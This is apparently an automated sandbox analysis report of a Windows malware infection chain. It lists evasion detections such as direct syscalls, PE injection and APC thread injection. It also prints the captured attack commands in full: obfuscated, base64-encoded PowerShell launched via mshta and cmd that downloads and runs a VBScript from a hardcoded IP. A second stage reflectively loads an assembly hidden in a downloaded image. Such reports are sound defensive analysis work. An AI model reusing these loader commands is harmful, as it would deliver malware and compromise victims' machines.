                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 12_2_01789486 mov eax, dword ptr fs:[00000030h]12_2_01789486
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 12_2_01788770 mov eax, dword ptr fs:[00000030h]12_2_01788770
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 12_2_01790770 mov eax, dword ptr fs:[00000030h]12_2_01790770
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 12_2_01790770 mov eax, dword ptr fs:[00000030h]12_2_01790770
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 12_2_01790770 mov eax, dword ptr fs:[00000030h]12_2_01790770
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 12_2_01790770 mov eax, dword ptr fs:[00000030h]12_2_01790770
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 12_2_01790770 mov eax, dword ptr fs:[00000030h]12_2_01790770
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 12_2_01790770 mov eax, dword ptr fs:[00000030h]12_2_01790770
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 12_2_01790770 mov eax, dword ptr fs:[00000030h]12_2_01790770
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 12_2_01790770 mov eax, dword ptr fs:[00000030h]12_2_01790770
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 12_2_01790770 mov eax, dword ptr fs:[00000030h]12_2_01790770
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: DebugJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: DebugJump to behavior

                      HIPS / PFW / Operating System Protection Evasion

                      barindex
                      Yara detected Powershell decode and execute
                      Source: Yara matchFile source: amsi32_6364.amsi.csv, type: OTHER
                      Yara detected Powershell download and execute
                      Source: Yara matchFile source: amsi32_6364.amsi.csv, type: OTHER
                      Source: Yara matchFile source: Process Memory Space: powershell.exe PID: 6364, type: MEMORYSTR
                      Found direct / indirect Syscall (likely to bypass EDR)
                      Source: C:\Program Files (x86)\jUNEQWDieJNjpKeEnQjcaTVCbRoYdKlVACJfKLmyhnZTcujySKMhMUlEDsxRiIVRgTYWoZbCH\HDLzkMKGEKBh.exeNtCreateMutant: Direct from: 0x774635CCJump to behavior
                      Source: C:\Program Files (x86)\jUNEQWDieJNjpKeEnQjcaTVCbRoYdKlVACJfKLmyhnZTcujySKMhMUlEDsxRiIVRgTYWoZbCH\HDLzkMKGEKBh.exeNtWriteVirtualMemory: Direct from: 0x77462E3CJump to behavior
                      Source: C:\Program Files (x86)\jUNEQWDieJNjpKeEnQjcaTVCbRoYdKlVACJfKLmyhnZTcujySKMhMUlEDsxRiIVRgTYWoZbCH\HDLzkMKGEKBh.exeNtMapViewOfSection: Direct from: 0x77462D1CJump to behavior
                      Source: C:\Program Files (x86)\jUNEQWDieJNjpKeEnQjcaTVCbRoYdKlVACJfKLmyhnZTcujySKMhMUlEDsxRiIVRgTYWoZbCH\HDLzkMKGEKBh.exeNtResumeThread: Direct from: 0x774636ACJump to behavior
                      Source: C:\Program Files (x86)\jUNEQWDieJNjpKeEnQjcaTVCbRoYdKlVACJfKLmyhnZTcujySKMhMUlEDsxRiIVRgTYWoZbCH\HDLzkMKGEKBh.exeNtProtectVirtualMemory: Direct from: 0x77462F9CJump to behavior
                      Source: C:\Program Files (x86)\jUNEQWDieJNjpKeEnQjcaTVCbRoYdKlVACJfKLmyhnZTcujySKMhMUlEDsxRiIVRgTYWoZbCH\HDLzkMKGEKBh.exeNtSetInformationProcess: Direct from: 0x77462C5CJump to behavior
                      Source: C:\Program Files (x86)\jUNEQWDieJNjpKeEnQjcaTVCbRoYdKlVACJfKLmyhnZTcujySKMhMUlEDsxRiIVRgTYWoZbCH\HDLzkMKGEKBh.exeNtSetInformationThread: Direct from: 0x774563F9Jump to behavior
                      Source: C:\Program Files (x86)\jUNEQWDieJNjpKeEnQjcaTVCbRoYdKlVACJfKLmyhnZTcujySKMhMUlEDsxRiIVRgTYWoZbCH\HDLzkMKGEKBh.exeNtNotifyChangeKey: Direct from: 0x77463C2CJump to behavior
                      Source: C:\Program Files (x86)\jUNEQWDieJNjpKeEnQjcaTVCbRoYdKlVACJfKLmyhnZTcujySKMhMUlEDsxRiIVRgTYWoZbCH\HDLzkMKGEKBh.exeNtAllocateVirtualMemory: Direct from: 0x77462BFCJump to behavior
                      Source: C:\Program Files (x86)\jUNEQWDieJNjpKeEnQjcaTVCbRoYdKlVACJfKLmyhnZTcujySKMhMUlEDsxRiIVRgTYWoZbCH\HDLzkMKGEKBh.exeNtQueryInformationProcess: Direct from: 0x77462C26Jump to behavior
                      Source: C:\Program Files (x86)\jUNEQWDieJNjpKeEnQjcaTVCbRoYdKlVACJfKLmyhnZTcujySKMhMUlEDsxRiIVRgTYWoZbCH\HDLzkMKGEKBh.exeNtResumeThread: Direct from: 0x77462FBCJump to behavior
                      Source: C:\Program Files (x86)\jUNEQWDieJNjpKeEnQjcaTVCbRoYdKlVACJfKLmyhnZTcujySKMhMUlEDsxRiIVRgTYWoZbCH\HDLzkMKGEKBh.exeNtReadFile: Direct from: 0x77462ADCJump to behavior
                      Source: C:\Program Files (x86)\jUNEQWDieJNjpKeEnQjcaTVCbRoYdKlVACJfKLmyhnZTcujySKMhMUlEDsxRiIVRgTYWoZbCH\HDLzkMKGEKBh.exeNtQuerySystemInformation: Direct from: 0x77462DFCJump to behavior
                      Source: C:\Program Files (x86)\jUNEQWDieJNjpKeEnQjcaTVCbRoYdKlVACJfKLmyhnZTcujySKMhMUlEDsxRiIVRgTYWoZbCH\HDLzkMKGEKBh.exeNtDelayExecution: Direct from: 0x77462DDCJump to behavior
                      Source: C:\Program Files (x86)\jUNEQWDieJNjpKeEnQjcaTVCbRoYdKlVACJfKLmyhnZTcujySKMhMUlEDsxRiIVRgTYWoZbCH\HDLzkMKGEKBh.exeNtAllocateVirtualMemory: Direct from: 0x77463C9CJump to behavior
                      Source: C:\Program Files (x86)\jUNEQWDieJNjpKeEnQjcaTVCbRoYdKlVACJfKLmyhnZTcujySKMhMUlEDsxRiIVRgTYWoZbCH\HDLzkMKGEKBh.exeNtClose: Direct from: 0x77462B6C
                      Source: C:\Program Files (x86)\jUNEQWDieJNjpKeEnQjcaTVCbRoYdKlVACJfKLmyhnZTcujySKMhMUlEDsxRiIVRgTYWoZbCH\HDLzkMKGEKBh.exeNtCreateUserProcess: Direct from: 0x7746371CJump to behavior
                      Source: C:\Program Files (x86)\jUNEQWDieJNjpKeEnQjcaTVCbRoYdKlVACJfKLmyhnZTcujySKMhMUlEDsxRiIVRgTYWoZbCH\HDLzkMKGEKBh.exeNtWriteVirtualMemory: Direct from: 0x7746490CJump to behavior
                      Source: C:\Program Files (x86)\jUNEQWDieJNjpKeEnQjcaTVCbRoYdKlVACJfKLmyhnZTcujySKMhMUlEDsxRiIVRgTYWoZbCH\HDLzkMKGEKBh.exeNtAllocateVirtualMemory: Direct from: 0x774648ECJump to behavior
                      Source: C:\Program Files (x86)\jUNEQWDieJNjpKeEnQjcaTVCbRoYdKlVACJfKLmyhnZTcujySKMhMUlEDsxRiIVRgTYWoZbCH\HDLzkMKGEKBh.exeNtQuerySystemInformation: Direct from: 0x774648CCJump to behavior
                      Source: C:\Program Files (x86)\jUNEQWDieJNjpKeEnQjcaTVCbRoYdKlVACJfKLmyhnZTcujySKMhMUlEDsxRiIVRgTYWoZbCH\HDLzkMKGEKBh.exeNtQueryVolumeInformationFile: Direct from: 0x77462F2CJump to behavior
                      Source: C:\Program Files (x86)\jUNEQWDieJNjpKeEnQjcaTVCbRoYdKlVACJfKLmyhnZTcujySKMhMUlEDsxRiIVRgTYWoZbCH\HDLzkMKGEKBh.exeNtReadVirtualMemory: Direct from: 0x77462E8CJump to behavior
                      Source: C:\Program Files (x86)\jUNEQWDieJNjpKeEnQjcaTVCbRoYdKlVACJfKLmyhnZTcujySKMhMUlEDsxRiIVRgTYWoZbCH\HDLzkMKGEKBh.exeNtCreateKey: Direct from: 0x77462C6CJump to behavior
                      Source: C:\Program Files (x86)\jUNEQWDieJNjpKeEnQjcaTVCbRoYdKlVACJfKLmyhnZTcujySKMhMUlEDsxRiIVRgTYWoZbCH\HDLzkMKGEKBh.exeNtSetInformationThread: Direct from: 0x77462B4CJump to behavior
                      Source: C:\Program Files (x86)\jUNEQWDieJNjpKeEnQjcaTVCbRoYdKlVACJfKLmyhnZTcujySKMhMUlEDsxRiIVRgTYWoZbCH\HDLzkMKGEKBh.exeNtQueryAttributesFile: Direct from: 0x77462E6CJump to behavior
                      Source: C:\Program Files (x86)\jUNEQWDieJNjpKeEnQjcaTVCbRoYdKlVACJfKLmyhnZTcujySKMhMUlEDsxRiIVRgTYWoZbCH\HDLzkMKGEKBh.exeNtDeviceIoControlFile: Direct from: 0x77462AECJump to behavior
                      Source: C:\Program Files (x86)\jUNEQWDieJNjpKeEnQjcaTVCbRoYdKlVACJfKLmyhnZTcujySKMhMUlEDsxRiIVRgTYWoZbCH\HDLzkMKGEKBh.exeNtOpenSection: Direct from: 0x77462E0CJump to behavior
                      Source: C:\Program Files (x86)\jUNEQWDieJNjpKeEnQjcaTVCbRoYdKlVACJfKLmyhnZTcujySKMhMUlEDsxRiIVRgTYWoZbCH\HDLzkMKGEKBh.exeNtCreateFile: Direct from: 0x77462FECJump to behavior
                      Source: C:\Program Files (x86)\jUNEQWDieJNjpKeEnQjcaTVCbRoYdKlVACJfKLmyhnZTcujySKMhMUlEDsxRiIVRgTYWoZbCH\HDLzkMKGEKBh.exeNtOpenFile: Direct from: 0x77462DCCJump to behavior
                      Source: C:\Program Files (x86)\jUNEQWDieJNjpKeEnQjcaTVCbRoYdKlVACJfKLmyhnZTcujySKMhMUlEDsxRiIVRgTYWoZbCH\HDLzkMKGEKBh.exeNtQueryInformationToken: Direct from: 0x77462CACJump to behavior
                      Source: C:\Program Files (x86)\jUNEQWDieJNjpKeEnQjcaTVCbRoYdKlVACJfKLmyhnZTcujySKMhMUlEDsxRiIVRgTYWoZbCH\HDLzkMKGEKBh.exeNtTerminateThread: Direct from: 0x77462FCCJump to behavior
                      Source: C:\Program Files (x86)\jUNEQWDieJNjpKeEnQjcaTVCbRoYdKlVACJfKLmyhnZTcujySKMhMUlEDsxRiIVRgTYWoZbCH\HDLzkMKGEKBh.exeNtAllocateVirtualMemory: Direct from: 0x77462BECJump to behavior
                      Source: C:\Program Files (x86)\jUNEQWDieJNjpKeEnQjcaTVCbRoYdKlVACJfKLmyhnZTcujySKMhMUlEDsxRiIVRgTYWoZbCH\HDLzkMKGEKBh.exeNtOpenKeyEx: Direct from: 0x77462B9CJump to behavior
                      Injects a PE file into a foreign processes
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe base: 400000 value starts with: 4D5AJump to behavior
                      Maps a DLL or memory area into another process
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeSection loaded: NULL target: C:\Program Files (x86)\jUNEQWDieJNjpKeEnQjcaTVCbRoYdKlVACJfKLmyhnZTcujySKMhMUlEDsxRiIVRgTYWoZbCH\HDLzkMKGEKBh.exe protection: execute and read and writeJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeSection loaded: NULL target: C:\Windows\SysWOW64\msinfo32.exe protection: execute and read and writeJump to behavior
                      Source: C:\Windows\SysWOW64\msinfo32.exeSection loaded: NULL target: C:\Program Files (x86)\jUNEQWDieJNjpKeEnQjcaTVCbRoYdKlVACJfKLmyhnZTcujySKMhMUlEDsxRiIVRgTYWoZbCH\HDLzkMKGEKBh.exe protection: read writeJump to behavior
                      Source: C:\Windows\SysWOW64\msinfo32.exeSection loaded: NULL target: C:\Program Files (x86)\jUNEQWDieJNjpKeEnQjcaTVCbRoYdKlVACJfKLmyhnZTcujySKMhMUlEDsxRiIVRgTYWoZbCH\HDLzkMKGEKBh.exe protection: execute and read and writeJump to behavior
                      Source: C:\Windows\SysWOW64\msinfo32.exeSection loaded: NULL target: C:\Program Files\Mozilla Firefox\firefox.exe protection: read writeJump to behavior
                      Source: C:\Windows\SysWOW64\msinfo32.exeSection loaded: NULL target: C:\Program Files\Mozilla Firefox\firefox.exe protection: execute and read and writeJump to behavior
                      Modifies the context of a thread in another process (thread injection)
                      Source: C:\Windows\SysWOW64\msinfo32.exeThread register set: target process: 7908Jump to behavior
                      Queues an APC in another process (thread injection)
                      Source: C:\Windows\SysWOW64\msinfo32.exeThread APC queued: target process: C:\Program Files (x86)\jUNEQWDieJNjpKeEnQjcaTVCbRoYdKlVACJfKLmyhnZTcujySKMhMUlEDsxRiIVRgTYWoZbCH\HDLzkMKGEKBh.exeJump to behavior
                      Writes to foreign memory regions
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe base: 400000Jump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe base: 401000Jump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe base: FFF008Jump to behavior
                      Source: C:\Windows\SysWOW64\mshta.exeProcess created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\system32\cmd.exe" "/c pOwersHeLL -ex bYpASS -NoP -w 1 -c DeVIceCrEDeNTIALDEPLOyMent ; iNvoKe-EXpRESSioN($(inVoKe-ExPRESsIOn('[sySTEm.teXT.eNcoDIng]'+[chaR]0x3A+[ChAR]58+'uTF8.GEtSTriNg([SysTeM.CoNVERt]'+[cHar]58+[CHAr]58+'fROMBaSE64STRiNG('+[ChAr]0x22+'JDM4TDVlalpXSUdyICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICA9ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBhZEQtVHlQZSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLU1FTWJFcmRlRklOSXRJb24gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICdbRGxsSW1wb3J0KCJVUkxNb24iLCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgQ2hhclNldCA9IENoYXJTZXQuVW5pY29kZSldcHVibGljIHN0YXRpYyBleHRlcm4gSW50UHRyIFVSTERvd25sb2FkVG9GaWxlKEludFB0ciAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgZ3JKcHosc3RyaW5nICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBOQSxzdHJpbmcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIG1NeSx1aW50ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBWY09oeUxjTkloVSxJbnRQdHIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIHNJTnQpOycgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1uQW1FICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAiUGV6TWJGd0JaZiIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1uYU1FU1BBQ2UgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIHpGY3FXayAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLVBhc3NUaHJ1OyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgJDM4TDVlalpXSUdyOjpVUkxEb3dubG9hZFRvRmlsZSgwLCJodHRwOi8vMTA3LjE3Mi40NC4xNzUvMjQ0L25pZ2h0cmlkaW5naXNyZWFsbHluaWNlZm9yd29ya2luZ3NraWxsZW50aXJldGltZWZvcm5ldy50aUZGIiwiJGVuVjpBUFBEQVRBXG5pZ2h0cmlkaW5naXNyZWFsbHluaWNlZm9yd29ya2luZ3NraWxsZW50aXJldGltZWZvcm4udmJTIiwwLDApO3NUQXJ0LXNMZWVwKDMpO0lJICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAiJGVudjpBUFBEQVRBXG5pZ2h0cmlkaW5naXNyZWFsbHluaWNlZm9yd29ya2luZ3NraWxsZW50aXJldGltZWZvcm4udmJTIg=='+[cHAr]34+'))')))"Jump to behavior
                      Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe pOwersHeLL -ex bYpASS -NoP -w 1 -c DeVIceCrEDeNTIALDEPLOyMent ; iNvoKe-EXpRESSioN($(inVoKe-ExPRESsIOn('[sySTEm.teXT.eNcoDIng]'+[chaR]0x3A+[ChAR]58+'uTF8.GEtSTriNg([SysTeM.CoNVERt]'+[cHar]58+[CHAr]58+'fROMBaSE64STRiNG('+[ChAr]0x22+'JDM4TDVlalpXSUdyICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICA9ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBhZEQtVHlQZSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLU1FTWJFcmRlRklOSXRJb24gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICdbRGxsSW1wb3J0KCJVUkxNb24iLCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgQ2hhclNldCA9IENoYXJTZXQuVW5pY29kZSldcHVibGljIHN0YXRpYyBleHRlcm4gSW50UHRyIFVSTERvd25sb2FkVG9GaWxlKEludFB0ciAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgZ3JKcHosc3RyaW5nICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBOQSxzdHJpbmcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIG1NeSx1aW50ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBWY09oeUxjTkloVSxJbnRQdHIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIHNJTnQpOycgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1uQW1FICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAiUGV6TWJGd0JaZiIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1uYU1FU1BBQ2UgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIHpGY3FXayAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLVBhc3NUaHJ1OyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgJDM4TDVlalpXSUdyOjpVUkxEb3dubG9hZFRvRmlsZSgwLCJodHRwOi8vMTA3LjE3Mi40NC4xNzUvMjQ0L25pZ2h0cmlkaW5naXNyZWFsbHluaWNlZm9yd29ya2luZ3NraWxsZW50aXJldGltZWZvcm5ldy50aUZGIiwiJGVuVjpBUFBEQVRBXG5pZ2h0cmlkaW5naXNyZWFsbHluaWNlZm9yd29ya2luZ3NraWxsZW50aXJldGltZWZvcm4udmJTIiwwLDApO3NUQXJ0LXNMZWVwKDMpO0lJICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAiJGVudjpBUFBEQVRBXG5pZ2h0cmlkaW5naXNyZWFsbHluaWNlZm9yd29ya2luZ3NraWxsZW50aXJldGltZWZvcm4udmJTIg=='+[cHAr]34+'))')))"Jump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\hfoj0pnm\hfoj0pnm.cmdline"Jump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\wscript.exe "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\nightridingisreallyniceforworkingskillentiretimeforn.vbS" Jump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RES66CD.tmp" "c:\Users\user\AppData\Local\Temp\hfoj0pnm\CSC102A1040D3F84A7CBD6AF35F51E7FDEF.TMP"Jump to behavior
                      Source: C:\Windows\SysWOW64\wscript.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" $familial = 'JHNlcmVuYWRlID0gJ2h0dHBzOi8vcmVzLmNsb3VkaW5hcnkuY29tL2R5dGZsdDYxbi9pbWFnZS91cGxvYWQvdjE3MzMxMzQ5NDcvYmtscHlzZXlldXQ0aW1wdzUwbjEuanBnICc7JGZ1Z3VzID0gTmV3LU9iamVjdCBTeXN0ZW0uTmV0LldlYkNsaWVudDskYm94aWVyID0gJGZ1Z3VzLkRvd25sb2FkRGF0YSgkc2VyZW5hZGUpOyRwYXJ0aWN1bGFyaXplID0gW1N5c3RlbS5UZXh0LkVuY29kaW5nXTo6VVRGOC5HZXRTdHJpbmcoJGJveGllcik7JHBsYWlubmVzcyA9ICc8PEJBU0U2NF9TVEFSVD4+JzskcmF0dGxlYm94ZXMgPSAnPDxCQVNFNjRfRU5EPj4nOyRzdXBlcnByb2ZpdCA9ICRwYXJ0aWN1bGFyaXplLkluZGV4T2YoJHBsYWlubmVzcyk7JGNhbnRpbGxhdGluZyA9ICRwYXJ0aWN1bGFyaXplLkluZGV4T2YoJHJhdHRsZWJveGVzKTskc3VwZXJwcm9maXQgLWdlIDAgLWFuZCAkY2FudGlsbGF0aW5nIC1ndCAkc3VwZXJwcm9maXQ7JHN1cGVycHJvZml0ICs9ICRwbGFpbm5lc3MuTGVuZ3RoOyR1bmZyZWVkID0gJGNhbnRpbGxhdGluZyAtICRzdXBlcnByb2ZpdDskdmluY2FzID0gJHBhcnRpY3VsYXJpemUuU3Vic3RyaW5nKCRzdXBlcnByb2ZpdCwgJHVuZnJlZWQpOyRwcm9ib3NjaWRpYW4gPSAtam9pbiAoJHZpbmNhcy5Ub0NoYXJBcnJheSgpIHwgRm9yRWFjaC1PYmplY3QgeyAkXyB9KVstMS4uLSgkdmluY2FzLkxlbmd0aCldOyRrb21vbmRvciA9IFtTeXN0ZW0uQ29udmVydF06OkZyb21CYXNlNjRTdHJpbmcoJHByb2Jvc2NpZGlhbik7JG51cnNlcnltYW4gPSBbU3lzdGVtLlJlZmxlY3Rpb24uQXNzZW1ibHldOjpMb2FkKCRrb21vbmRvcik7JGdhcm5pZXJpdGUgPSBbZG5saWIuSU8uSG9tZV0uR2V0TWV0aG9kKCdWQUknKTskZ2Fybmllcml0ZS5JbnZva2UoJG51bGwsIEAoJ3R4dC5GREdGUi80NDIvNTcxLjQ0LjI3MS43MDEvLzpwdHRoJywgJyRzYXlzdCcsICckc2F5c3QnLCAnJHNheXN0JywgJ2FzcG5ldF9jb21waWxlcicsICckc2F5c3QnLCAnJHNheXN0JywnJHNheXN0JywnJHNheXN0JywnJHNheXN0JywnJHNheXN0JywnJHNheXN0JywnMScsJyRzYXlzdCcpKTs=';$monophthongs = [System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String($familial));Invoke-Expression $monophthongsJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe"Jump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe"Jump to behavior
                      Source: C:\Program Files (x86)\jUNEQWDieJNjpKeEnQjcaTVCbRoYdKlVACJfKLmyhnZTcujySKMhMUlEDsxRiIVRgTYWoZbCH\HDLzkMKGEKBh.exeProcess created: C:\Windows\SysWOW64\msinfo32.exe "C:\Windows\SysWOW64\msinfo32.exe"Jump to behavior
                      Source: C:\Windows\SysWOW64\msinfo32.exeProcess created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\Firefox.exe"Jump to behavior
                      Source: C:\Windows\SysWOW64\mshta.exeProcess created: C:\Windows\SysWOW64\cmd.exe "c:\windows\system32\cmd.exe" "/c powershell -ex bypass -nop -w 1 -c devicecredentialdeployment ; invoke-expression($(invoke-expression('[system.text.encoding]'+[char]0x3a+[char]58+'utf8.getstring([system.convert]'+[char]58+[char]58+'frombase64string('+[char]0x22+'jdm4tdvlalpxsudyicagicagicagicagicagicagicagicagicagicagica9icagicagicagicagicagicagicagicagicagicagicbhzeqtvhlqzsagicagicagicagicagicagicagicagicagicagicaglu1ftwjfcmrlrklosxrjb24gicagicagicagicagicagicagicagicagicagicagicdbrgxssw1wb3j0kcjvukxnb24ilcagicagicagicagicagicagicagicagicagicagicagq2hhclnldca9ienoyxjtzxquvw5py29kzsldchvibgljihn0yxrpyyblehrlcm4gsw50uhryifvstervd25sb2fkvg9gawxlkeludfb0ciagicagicagicagicagicagicagicagicagicagicagz3jkchosc3ryaw5nicagicagicagicagicagicagicagicagicagicagicboqsxzdhjpbmcgicagicagicagicagicagicagicagicagicagicagig1nesx1aw50icagicagicagicagicagicagicagicagicagicagicbwy09oeuxjtklovsxjbnrqdhigicagicagicagicagicagicagicagicagicagicagihnjtnqpoycgicagicagicagicagicagicagicagicagicagicagic1uqw1ficagicagicagicagicagicagicagicagicagicagicaiugv6twjgd0jaziigicagicagicagicagicagicagicagicagicagicagic1uyu1fu1bbq2ugicagicagicagicagicagicagicagicagicagicagihpgy3fxayagicagicagicagicagicagicagicagicagicagicaglvbhc3nuahj1oyagicagicagicagicagicagicagicagicagicagicagjdm4tdvlalpxsudyojpvukxeb3dubg9hzfrvrmlszsgwlcjodhrwoi8vmta3lje3mi40nc4xnzuvmjq0l25pz2h0cmlkaw5naxnyzwfsbhluawnlzm9yd29ya2luz3nrawxszw50axjldgltzwzvcm5ldy50auzgiiwijgvuvjpbufbeqvrbxg5pz2h0cmlkaw5naxnyzwfsbhluawnlzm9yd29ya2luz3nrawxszw50axjldgltzwzvcm4udmjtiiwwldapo3nuqxj0lxnmzwvwkdmpo0ljicagicagicagicagicagicagicagicagicagicagicaijgvudjpbufbeqvrbxg5pz2h0cmlkaw5naxnyzwfsbhluawnlzm9yd29ya2luz3nrawxszw50axjldgltzwzvcm4udmjtig=='+[char]34+'))')))"
                      Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell -ex bypass -nop -w 1 -c devicecredentialdeployment ; invoke-expression($(invoke-expression('[system.text.encoding]'+[char]0x3a+[char]58+'utf8.getstring([system.convert]'+[char]58+[char]58+'frombase64string('+[char]0x22+'jdm4tdvlalpxsudyicagicagicagicagicagicagicagicagicagicagica9icagicagicagicagicagicagicagicagicagicagicbhzeqtvhlqzsagicagicagicagicagicagicagicagicagicagicaglu1ftwjfcmrlrklosxrjb24gicagicagicagicagicagicagicagicagicagicagicdbrgxssw1wb3j0kcjvukxnb24ilcagicagicagicagicagicagicagicagicagicagicagq2hhclnldca9ienoyxjtzxquvw5py29kzsldchvibgljihn0yxrpyyblehrlcm4gsw50uhryifvstervd25sb2fkvg9gawxlkeludfb0ciagicagicagicagicagicagicagicagicagicagicagz3jkchosc3ryaw5nicagicagicagicagicagicagicagicagicagicagicboqsxzdhjpbmcgicagicagicagicagicagicagicagicagicagicagig1nesx1aw50icagicagicagicagicagicagicagicagicagicagicbwy09oeuxjtklovsxjbnrqdhigicagicagicagicagicagicagicagicagicagicagihnjtnqpoycgicagicagicagicagicagicagicagicagicagicagic1uqw1ficagicagicagicagicagicagicagicagicagicagicaiugv6twjgd0jaziigicagicagicagicagicagicagicagicagicagicagic1uyu1fu1bbq2ugicagicagicagicagicagicagicagicagicagicagihpgy3fxayagicagicagicagicagicagicagicagicagicagicaglvbhc3nuahj1oyagicagicagicagicagicagicagicagicagicagicagjdm4tdvlalpxsudyojpvukxeb3dubg9hzfrvrmlszsgwlcjodhrwoi8vmta3lje3mi40nc4xnzuvmjq0l25pz2h0cmlkaw5naxnyzwfsbhluawnlzm9yd29ya2luz3nrawxszw50axjldgltzwzvcm5ldy50auzgiiwijgvuvjpbufbeqvrbxg5pz2h0cmlkaw5naxnyzwfsbhluawnlzm9yd29ya2luz3nrawxszw50axjldgltzwzvcm4udmjtiiwwldapo3nuqxj0lxnmzwvwkdmpo0ljicagicagicagicagicagicagicagicagicagicagicaijgvudjpbufbeqvrbxg5pz2h0cmlkaw5naxnyzwfsbhluawnlzm9yd29ya2luz3nrawxszw50axjldgltzwzvcm4udmjtig=='+[char]34+'))')))"
